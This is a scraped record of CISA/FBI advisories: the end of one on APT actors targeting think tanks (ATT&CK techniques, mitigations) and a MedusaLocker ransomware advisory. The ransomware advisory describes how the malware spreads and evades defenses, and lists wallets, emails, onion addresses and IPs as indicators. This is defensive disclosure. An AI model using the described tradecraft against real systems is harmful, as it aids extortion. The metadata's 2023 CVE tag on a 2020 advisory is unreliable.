[[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n * Remote System Discovery [[T1018](<https://attack.mitre.org/versions/v7/techniques/T1018>)]\n * System Owner/User Discovery [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n * Network Sniffing [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040>)]\n * Network Service Scanning [[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046>)]\n * System Network Connections Discovery [[T1049](<https://attack.mitre.org/versions/v7/techniques/T1049>)]\n * Process Discovery [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057>)]\n * Permission Groups Discovery: Local Groups [[T1069.001](<https://attack.mitre.org/versions/v7/techniques/T1069/001>)]\n * Permission Groups Discovery: Domain Groups [[T1069.002](<https://attack.mitre.org/versions/v7/techniques/T1069/002>)]\n * System Information Discovery [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n * File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083>)]\n * Account Discovery: Local Account [[T1087.001](<https://attack.mitre.org/versions/v7/techniques/T1087/001>)]\n * Account Discovery: Domain Account [[T1087.002](<https://attack.mitre.org/versions/v7/techniques/T1087/002>)]\n * Peripheral Device Discovery [[T1120](<https://attack.mitre.org/versions/v7/techniques/T1120>)]\n * Network Share Discovery [[T1135](<https://attack.mitre.org/versions/v7/techniques/T1135>)]\n * Password Policy Discovery [[T1201](<https://attack.mitre.org/versions/v7/techniques/T1201/>)]\n * Software Discovery: Security Software Discovery [[T1518.001](<https://attack.mitre.org/versions/v7/techniques/T1518/001>)]\n * _**Lateral Movement **_[[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008>)] \n * Remote Services: Remote Desktop Protocol [[T1021.001](<https://attack.mitre.org/versions/v7/techniques/T1021/001>)]\n * Remote Services: SSH [[T1021.004](<https://attack.mitre.org/versions/v7/techniques/T1021/004>)]\n * Taint Shared Content [[T1080](<https://attack.mitre.org/versions/v7/techniques/T1080/>)]\n * Replication Through Removable Media [[T1091](<https://attack.mitre.org/versions/v7/techniques/T1091>)]\n * Exploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v7/techniques/T1210>)]\n * Use Alternate Authentication Material: Pass the Hash [[T1550.002](<https://attack.mitre.org/versions/v7/techniques/T1550/002>)]\n * Use Alternate Authentication Material: Pass the Ticket [[T1550.003](<https://attack.mitre.org/versions/v7/techniques/T1550/003>)]\n * _**Collection**_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009>)] \n * Data from Local System [[T1005](<https://attack.mitre.org/versions/v7/techniques/T1005>)]\n * Data from Removable Media [[T1025](<https://attack.mitre.org/versions/v7/techniques/T1025>)]\n * Data Staged: Local Data Staging [[T1074.001](<https://attack.mitre.org/versions/v7/techniques/T1074/001>)]\n * Screen Capture [[T1113](<https://attack.mitre.org/versions/v7/techniques/T1113>)]\n * Email Collection: Local Email Collection [[T1114.001](<https://attack.mitre.org/versions/v7/techniques/T1114/001>)]\n * Email Collection: Remote Email Collection [[T1114.002](<https://attack.mitre.org/versions/v7/techniques/T1114/002>)]\n * Automated Collection [[T1119](<https://attack.mitre.org/versions/v7/techniques/T1119>)]\n * Audio Capture [[T1123](<https://attack.mitre.org/versions/v7/techniques/T1123>)]\n * Data from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v7/techniques/T1213/002>)]\n * Archive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v7/techniques/T1560/001>)]\n * Archive Collected Data: Archive via Custom Method [[T1560.003](<https://attack.mitre.org/versions/v7/techniques/T1560/003>)]\n * _**Command and Control**_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011>)] \n * Data Obfuscation: Junk Data [[T1001.001](<https://attack.mitre.org/versions/v7/techniques/T1001/001/>)]\n * Fallback Channels [[T1008](<https://attack.mitre.org/versions/v7/techniques/T1008>)]\n * Application Layer Protocol: Web Protocols [[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n * Application Layer Protocol: File Transfer Protocols [[T1071.002](<https://attack.mitre.org/versions/v7/techniques/T1071/002>)]\n * Application Layer Protocol: Mail Protocols [[T1071.003](<https://attack.mitre.org/versions/v7/techniques/T1071/003>)]\n * Application Layer Protocol: DNS [[T1071.004](<https://attack.mitre.org/versions/v7/techniques/T1071/004>)]\n * Proxy: External Proxy [[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)]\n * Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)]\n * Proxy: Domain Fronting [[T1090.004](<https://attack.mitre.org/versions/v7/techniques/T1090/004>)]\n * Communication Through Removable Media [[T1092](<https://attack.mitre.org/versions/v7/techniques/T1092>)]\n * Non-Application Layer Protocol [[T1095](<https://attack.mitre.org/versions/v7/techniques/T1095>)]\n * Web Service: Dead Drop Resolver [[T1102.001](<https://attack.mitre.org/versions/v7/techniques/T1102/001>)]\n * Web Service: Bidirectional Communication [[T1102.002](<https://attack.mitre.org/versions/v7/techniques/T1102/002>)]\n * Multi-Stage Channels [[T1104](<https://attack.mitre.org/versions/v7/techniques/T1104>)]\n * Ingress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v7/techniques/T1105>)]\n * Data Encoding: Standard Encoding [[T1132.001](<https://attack.mitre.org/versions/v7/techniques/T1132/001>)]\n * Remote Access Software [[T1219](<https://attack.mitre.org/versions/v7/techniques/T1219>)]\n * Dynamic Resolution: Domain Generation Algorithms [[T1568.002](<https://attack.mitre.org/versions/v7/techniques/T1568/002>)]\n * Non-Standard Port [[T1571](<https://attack.mitre.org/versions/v7/techniques/T1571>)]\n * Protocol Tunneling [[T1572](<https://attack.mitre.org/versions/v7/techniques/T1572>)]\n * Encrypted Channel: Symmetric Cryptography [[T1573.001](<https://attack.mitre.org/versions/v7/techniques/T1573/001>)]\n * Encrypted Channel: Asymmetric Cryptography [[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)]\n * _** Exfiltration** _[[TA0010](<https://attack.mitre.org/versions/v7/tactics/TA0010>)] \n * Exfiltration Over C2 Channel [[T1041](<https://attack.mitre.org/versions/v7/techniques/T1041>)]\n * Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [[T1048.003](<https://attack.mitre.org/versions/v7/techniques/T1048/003>)]\n * _**Impact **_[[TA0040](<https://attack.mitre.org/versions/v7/tactics/TA0040>)] \n * Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v7/techniques/T1486>)]\n * Resource Hijacking [[T1496](<https://attack.mitre.org/versions/v7/techniques/T1496>)]\n * System Shutdown/Reboot [[T1529](<https://attack.mitre.org/versions/v7/techniques/T1529>)]\n * Disk Wipe: Disk Structure Wipe [[T1561.002](<https://attack.mitre.org/versions/v7/techniques/T1561/002>)]\n\n### Mitigations\n\nCISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.\n\n#### Leaders\n\n * Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.\n\n#### Users/Staff\n\n * Log off remote connections when not in use.\n * Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).\n * Use different passwords for corporate and personal accounts.\n * Install antivirus software on personal devices to automatically scan and quarantine suspicious files.\n * Employ strong multi-factor authentication for personal accounts, if available.\n * Exercise caution when: \n * Opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Using removable media (e.g., USB thumb drives, external drives, CDs).\n\n#### IT Staff/Cybersecurity Personnel\n\n * Segment and segregate networks and functions.\n * Change the default username and password of applications and appliances.\n * Employ strong multi-factor authentication for corporate accounts.\n * Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.\n * Apply encryption to data at rest and data in transit.\n * Use email security appliances to scan and remove malicious email attachments or links.\n * Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.\n * Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on [Defending Against Malicious Cyber Activity Originating from Tor](<https://us-cert.cisa.gov/ncas/alerts/aa20-183a>) for mitigation options and additional information.\n * Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations. If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. Review CISA and FBI\u2019s [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>) and other CISA alerts that identify vulnerabilities exploited by foreign attackers.\n * Implement an antivirus program and a formalized patch management process.\n * Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).\n * Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).\n * Implement Group Policy Object and firewall rules.\n * Implement filters at the email gateway and block suspicious IP addresses at the firewall.\n * Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.\n * Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.\n * Implement a Domain-Based Message Authentication, Reporting &amp; Conformance (DMARC) validation system.\n * Disable or block unnecessary remote services.\n * Limit access to remote services through centrally managed concentrators.\n * Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.\n * Limit unnecessary lateral communications.\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Ensure applications do not store sensitive data or credentials insecurely.\n * Enable a firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure any scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to suspicious or risky sites. Contact law enforcement or CISA immediately regarding any unauthorized network access identified.\n * Visit the MITRE ATT&amp;CK techniques and tactics pages linked in the ATT&amp;CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n * [CISA Alert: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>)\n * [CISA Alert: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * [CISA Webpage: Telework Guidance](<https://www.cisa.gov/telework>)\n * [CISA Webpage: VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * [FBI Private Industry Notification: PIN 20200409-001](<http://image.communications.cyber.nj.gov/lib/fe3e15707564047c7c1270/m/2/PIN+-+4.9.2020.pdf>)\n\n### References\n\n[[1] CyberScoop: As Europe prepares to vote, Microsoft warns of Fancy Bear attacks on democratic think tanks](<https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/>)\n\n### Revisions\n\nInitial Version: December 1, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Advanced Persistent Threat Actors Targeting U.S. Think Tanks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-12-01T12:00:00", "id": "AA20-336A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-336a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:54:21", "description": "### Summary\n\n**Actions to take today to mitigate cyber threats from ransomware:** \n\u2022 Prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Train users to recognize and report phishing attempts. \n\u2022 Enable and enforce multifactor authentication.\n\n_Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing [#StopRansomware](<https://www.cisa.gov/stopransomware/stopransomware>) effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit [stopransomware.gov](<https://www.cisa.gov/stopransomware>) to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) are releasing this CSA to provide information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims\u2019 networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and the developer, who receives the remainder. \n\nDownload the PDF version of this report: pdf, 633 kb\n\n### Technical Details\n\nMedusaLocker ransomware actors most often gain access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations [[T1133](<https://attack.mitre.org/versions/v11/techniques/T1133/>)]. Actors also frequently use email phishing and spam email campaigns\u2014directly attaching the ransomware to the email\u2014as initial intrusion vectors [[T1566](<https://attack.mitre.org/versions/v11/techniques/T1566/>)].\n\nMedusaLocker ransomware uses a batch file to execute PowerShell script `invoke-ReflectivePEInjection` [[T1059.001](<https://attack.mitre.org/versions/v11/techniques/T1059/001/>)]. This script propagates MedusaLocker throughout the network by editing the `EnableLinkedConnections` value within the infected machine\u2019s registry, which then allows the infected machine to detect attached hosts and networks via Internet Control Message Protocol (ICMP) and to detect shared storage via Server Message Block (SMB) Protocol. \n\nMedusaLocker then: \n\n * Restarts the `LanmanWorkstation` service, which allows registry edits to take effect. \n * Kills the processes of well-known security, accounting, and forensic software. \n * Restarts the machine in safe mode to avoid detection by security software [[T1562.009](<https://attack.mitre.org/versions/v11/techniques/T1562/009>)].\n * Encrypts victim files with the AES-256 encryption algorithm; the resulting key is then encrypted with an RSA-2048 public key [[T1486](<https://attack.mitre.org/versions/v11/techniques/T1486/>)]. \n * Runs every 60 seconds, encrypting all files except those critical to the functionality of the victim\u2019s machine and those that have the designated encrypted file extension. \n * Establishes persistence by copying an executable (`svhost.exe` or `svhostt.exe`) to the `%APPDATA%\\Roaming` directory and scheduling a task to run the ransomware every 15 minutes. \n * Attempts to prevent standard recovery techniques by deleting local backups, disabling startup recovery options, and deleting shadow copies [[T1490](<https://attack.mitre.org/versions/v11/techniques/T1490/>)].\n\nMedusaLocker actors place a ransom note into every folder containing a file with the victim's encrypted data. The note outlines how to communicate with the MedusaLocker actors, typically providing victims one or more email address at which the actors can be reached. The size of MedusaLocker ransom demands appears to vary depending on the victim\u2019s financial status as perceived by the actors. \n\n\n#### **Indicators of Compromise**\n\nEncrypted File Extensions \n--- \n.1btc | .matlock20 | .marlock02 | .readinstructions \n.bec | .mylock | .jpz.nz | .marlock11 \n.cn | .NET1 | .key1 | .fileslocked \n.datalock | .NZ | .lock | .lockfilesUS \n.deadfilesgr | .tyco | .lockdata7 | .rs \n.faratak | .uslockhh | .lockfiles | .tyco \n.fileslock | .zoomzoom | .perfection | .uslockhh \n.marlock13 | n.exe | .Readinstruction | .marlock08 \n.marlock25 | nt_lock20 | .READINSTRUCTION | \n.marlock6 | .marlock01 | .ReadInstructions | \n \nRansom Note File Names \n--- \nhow_to_ recover_data.html | how_to_recover_data.html.marlock01 \ninstructions.html | READINSTRUCTION.html \n!!!HOW_TO_DECRYPT!!! | How_to_recovery.txt \nreadinstructions.html | readme_to_recover_files \nrecovery_instructions.html | HOW_TO_RECOVER_DATA.html \nrecovery_instruction.html | \n \nPayment Wallets \n--- \n14oxnsSc1LZ5M2cPZeQ9rFnXqEvPCnZikc \n1DRxUFhvJjGUdojCzMWSLmwx7Qxn79XbJq \n18wRbb94CjyTGkUp32ZM7krCYCB9MXUq42 \n1AbRxRfP6yHePpi7jmDZkS4Mfpm1ZiatH5 \n1Edcufenw1BB4ni9UadJpQh9LVx9JGtKpP \n1DyMbw6R9PbJqfUSDcK5729xQ57yJrE8BC \n184ZcAoxkvimvVZaj8jZFujC7EwR3BKWvf \n14oH2h12LvQ7BYBufcrY5vfKoCq2hTPoev \nbc1qy34v0zv6wu0cugea5xjlxagsfwgunwkzc0xcjj \nbc1q9jg45a039tn83jk2vhdpranty2y8tnpnrk9k5q \nbc1qz3lmcw4k58n79wpzm550r5pkzxc2h8rwmmu6xm \n1AereQUh8yjNPs9Wzeg1Le47dsqC8NNaNM \n1DeNHM2eTqHp5AszTsUiS4WDHWkGc5UxHf \n1HEDP3c3zPwiqUaYuWZ8gBFdAQQSa6sMGw \n1HdgQM9bjX7u7vWJnfErY4MWGBQJi5mVWV \n1nycdn9ebxht4tpspu4ehpjz9ghxlzipll \n12xd6KrWVtgHEJHKPEfXwMVWuFK4k1FCUF \n1HZHhdJ6VdwBLCFhdu7kDVZN9pb3BWeUED \n1PormUgPR72yv2FRKSVY27U4ekWMKobWjg \n14cATAzXwD7CQf35n8Ea5pKJPfhM6jEHak \n1PopeZ4LNLanisswLndAJB1QntTF8hpLsD \n \nEmail Addresses \n--- \nwillyhill1960@tutanota[.]com | unlockfile@cock[.]li \nzlo@keem[.]ne | unlockmeplease@airmail[.]cc \nzlo@keemail[.]me | unlockmeplease@protonmail[.]com \nzlo@tfwno[.]gf | willyhill1960@protonmail[.]com \nsupport@ypsotecs[.]com | support@imfoodst[.]com \n \nEmail Addresses \n--- \ntraceytevin@protonmail[.]com | support@itwgset[.]com \nunlock_file@aol[.]com | support@novibmaker[.]com \nunlock_file@outlook[.]com | support@securycasts[.]com \nsupport@exoprints[.]com | rewmiller-1974@protonmail[.]com \nsupport@exorints[.]com | rpd@keemail[.]me \nsupport@fanbridges[.]com | soterissylla@wyseil[.]com \nsupport@faneridges[.]com | support@careersill[.]com \nperfection@bestkoronavirus[.]com | karloskolorado@tutanota[.]com \npool1256@tutanota[.]com | kevynchaz@protonmail[.]com \nrapid@aaathats3as[.]com | korona@bestkoronavirus[.]com \nrescuer@tutanota[.]com | lockPerfection@gmail[.]com \nithelp01@decorous[.]cyou | lockperfection@gmail[.]com \nithelp01@wholeness[.]business | mulierfagus@rdhos[.]com \nithelp02@decorous[.]cyou | [rescuer]@cock[.]li \nithelp02@wholness[.]business | 107btc@protonmail[.]com \nithelpresotre@outlook[.]com | 33btc@protonmail[.]com \ncmd@jitjat[.]org | 777decoder777@protonmail[.]com \ncoronaviryz@gmail[.]com | 777decoder777@tfwno[.]gf \ndec_helper@dremno[.]com | andrewmiller-1974@protonmail[.]com \ndec_helper@excic[.]com | angelomartin-1980@protonmail[.]com \ndec_restore@prontonmail[.]com | ballioverus@quocor[.]com \ndec_restore1@outlook[.]com | beacon@jitjat[.]org \nbitcoin@sitesoutheat[.]com | beacon@msgsafe[.]io \nbriansalgado@protonmail[.]com | best666decoder@tutanota[.]com \nbugervongir@outlook[.]com | bitcoin@mobtouches[.]com \nbest666decoder@protonmail[.]com | encrypt2020@outlook[.]com \ndecoder83540@cock[.]li | fast-help@inbox[.]lv \ndecra2019@gmail[.]com | fuc_ktheworld1448@outlook[.]com \ndiniaminius@winrof[.]com | fucktheworld1448@cock[.]li \ndirhelp@keemail[.]me | gartaganisstuffback@gmail[.]com \n \nEmail Addresses \n--- \nemaila.elaich@iav.ac[.]ma | gavingonzalez@protonmail[.]com \nemd@jitjat[.]org | gsupp@onionmail[.]org \nencrypt2020@cock[.]li | gsupp@techmail[.]info \nbest666decoder@protonmail[.]com | helper@atacdi[.]com \nithelp@decorous[.]cyou | helper@buildingwin[.]com \nithelp@decorous[.]cyoum | helprestore@outlook[.]com \nithelp@wholeness[.]business | helptorestore@outlook[.]com \n \nTOR Addresses \n--- \nhttp://gvlay6u4g53rxdi5.onion/6-iSm1B1Ehljh8HYuXGym4Xyu1WdwsR2Av-6tXiw1BImsqoLh7pd207Rl6XYoln7sId \nhttp://gvlay6u4g53rxdi5.onion/8-grp514hncgblilsjtd32hg6jtbyhlocr5pqjswxfgf2oragnl3pqno6fkqcimqin \nhttp://gvlay6y4g53rxdi5.onion/21-8P4ZLCsMETPaLw9MkSlXJsNZWdHe0rxjt-XmBgZLWlm5ULGFCOJFuVdEymmxysofwu \nhttp://gvlay6u4g53rxdi5.onion/2l-8P4ZLCsMTPaLw9MkSlXJsNZWdHeOrxjtE9lck1MuXPYo29daQys6gomZZXUImN7Z \nhttp://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-DcaE9HeHywqSHvdcIwOndCS4PuWASX8g \nhttp://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-kB4rQXGKyxGiLyw7YDsMKSBjyfdwcyxo \nhttp://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-bET6JbB9vEMZ7qYBPqUMCxOQExFx4iOi \nhttp://gvlay6u4g53rxdi5. onion/8-MO0Q7O97Hgxvm1YbD7OMnimImZJXEWaG-RbH4TvdwVTGQB3X6VOUOP3lgO6YOJEOW \nhttp://gvlay6u4g53rxdi5.onion/8-gRp514hncgb1i1sjtD32hG6jTbUh1ocR-Uola2Fo30KTJvZX0otYZgTh5txmKwUNe \nhttp://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-OWQwD1w1Td7hY7IGUUjxmHMoFSQW6blg \nhttp://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-uGHwkkWCoUtBbZWN50sSS4Ds8RABkrKy \nhttp://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-Tj3PRnQlpHc9OftRVDGAWUulvE80yZbc \nhttp://gvlay6u4g53rxdi5.onion/8-Ww5sCBhsL8eM4PeAgsfgfa9lrqa81r31-tDQRZCAUe4164X532j9Ky16IBN9StWTH \nhttp://gvlay6u4g53rxdi5.onion/21-wIq5kK9gGKiTmyups1U6fABj1VnXIYRB-I5xek6PG2EbWlPC7C1rXfsqJBlWlFFfY \nqd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion \nhttp://medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion/leakdata/[REDACTED] \n \n**Disclaimer: **Many of these observed IP addresses are several years old and have been historically linked to MedusaLocker ransomware. We recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.\n\nIP Address | **Last Observed** \n---|--- \n195.123.246.138 | Nov-2021 \n138.124.186.221 | Nov-2021 \n159.223.0.9 | Nov-2021 \n45.146.164.141 | Nov-2021 \n185.220.101.35 | Nov-2021 \n185.220.100.249 | Sep-2021 \n50.80.219.149 | Sep-2021 \n185.220.101.146 | Sep-2021 \n185.220.101.252 | Sep-2021 \n179.60.150.97 | Sep-2021 \n84.38.189.52 | Sep-2021 \n94.232.43.63 | Jul-2021 \n108.11.30.103 | Apr-2021 \n194.61.55.94 | Apr-2021 \n198.50.233.202 | Apr-2021 \n40.92.90.105 | Jan-2021 \n188.68.216.23 | Dec-2020 \n87.251.75.71 | Dec-2020 \n196.240.57.20 | Oct-2020 \n198.0.198.5 | Aug-2020 \n194.5.220.122 | Mar-2020 \n194.5.250.124 | Mar-2020 \n194.5.220.124 | Mar-2020 \n104.210.72.161 | Nov-2019 \n \n### MITRE ATT&amp;CK Techniques\n\nMedusaLocker actors use the ATT&amp;CK techniques listed in Table 1.\n\n_Table 1: MedusaLocker Actors ATT&amp;CK Techniques for Enterprise_\n\n_Initial Access_ \n--- \n**Technique Title** | **ID** | **Use** \nExternal Remote Services | T1133 | MedusaLocker actors gained access to victim devices through vulnerable RDP configurations. \nPhishing | T1566 | MedusaLocker actors used phishing and spearphishing to obtain access to victims' networks. \n**_Execution_** \n**Technique Title** | **ID** | **Use** \nCommand and Scripting Interpreter: PowerShell | \n\nT1059.001\n\n| MedusaLocker actors may abuse PowerShell commands and scripts for execution. \n_**Defense Evasion**_ \n**Technique Title** | **ID** | **Use** \nImpair Defenses: Safe Mode Boot | \n\nT1562.009\n\n| MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. \n_**Impact**_ \n**Technique Title** | **ID** | **Use** \nData Encrypted for Impact | T1486 | MedusaLocker actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. \nInhibit System Recovery | T1490 | MedusaLocker actors may deny access to operating systems containing features that can help fix corrupted systems, such as backup catalog, volume shadow copies, and automatic repair. \n \n### Mitigations\n\n * Implement a recovery plan that maintains and retains multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n * Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.\n * Regularly back up data and password protect backup copies stored offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.\n * Install, regularly update, and enable real time detection for antivirus software on all hosts.\n * Install updates for operating systems, software, and firmware as soon as possible.\n * Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.\n * Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege. \n * Disable unused ports.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Enforce multifactor authentication (MFA).\n * Use National Institute of Standards and Technology (NIST) standards for developing and managing password policies: \n * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n * Store passwords in hashed format using industry-recognized password managers.\n * Add password user \u201csalts\u201d to shared login credentials.\n * Avoid reusing passwords.\n * Implement multiple failed login attempt account lockouts.\n * Disable password \u201chints\u201d.\n * Refrain from requiring password changes unless there is evidence of password compromise. **Note: **NIST guidance suggests favoring longer passwords and no longer require regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n * Require administrator credentials to install software.\n * Only use secure networks; avoid using public Wi-Fi networks.\n * Consider installing and using a virtual private network (VPN) to establish secure remote connections.\n * Focus on cybersecurity awareness and training. Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities, such as ransomware and phishing scams.\n\n### \nResources\n\n * Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide\n * No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment\n\n### Reporting\n\n * To report an incident and request technical assistance, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ) or 888-282-0870, or FBI through a local field office. \n * Financial Institutions must ensure compliance with any applicable Bank Secrecy Act requirements, including suspicious activity reporting obligations. Indicators of compromise (IOCs), such as suspicious email addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. For more information on mandatory and voluntary reporting of cyber events via SARs, see FinCEN Advisory FIN-2016-A005, _[Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime](<https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a005>)_, October 25, 2016; and FinCEN Advisory FIN-2021-A004, _[Advisory on Ransomware and the Use of the Financial System to Facilitate Ransom Payments](<https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2021-a004>)_, November 8, 2021, which updates FinCEN Advisory FIN-2020-A006.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ website](<https://www.state.gov/rewards-for-justice/>) for more information and how to report information securely.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used 